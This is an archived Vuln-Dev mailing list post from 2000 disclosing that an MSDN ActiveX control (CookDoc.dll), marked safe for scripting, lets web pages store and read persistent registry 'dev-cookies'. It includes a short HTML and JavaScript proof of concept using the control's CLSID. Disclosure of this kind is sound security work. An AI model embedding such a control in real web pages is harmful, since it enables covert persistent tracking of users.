Vulnerability Development mailing list archives
DevDoc ActiveX Cookie
From: Рягин Михаил Юрьевич <ryagin () EXTRIM RU>
Date: Wed, 8 Nov 2000 12:55:55 +0500
There is an ActiveX object, included for example, in Microsft MSDN
(develper's e-library), marked as safe for scripting, which allows
to store special "dev-cookies" on user computer.
Dev-Cookie is a named string of length <=126.
Name is limited to 127 characters.
It is saved under HKCU\Software\Microsoft\DevDoc\Cookie registry key
and keeps being available even after system reboots.
Example code:
------cut here-----
<OBJECT CLASSID="clsid:59CC0C20-679B-11D2-88BD-0800361A1803"
WIDTH=100 HEIGHT=100
ID="Cook">
</OBJECT>
<A HREF="javascript:Cook.putValue('windows','suxx');">put</A>
<A HREF="javascript:var c=Cook.getValue('windows'); alert('windows is '+c);">get</A>
-----cut there-----
First, click on 'put' link.
Second, close you browser window. You can even reboot your PC.
Third, click on 'get' link.
The malicious code is in the %Program Files%\Common Files\Microsoft Shared\MSDN\CookDoc.dll.
Tested on: Windows 2000, Windows 98, MSDN April 99, January 2000
Current thread:
- DevDoc ActiveX Cookie Рягин Михаил Юрьевич (Nov 09)
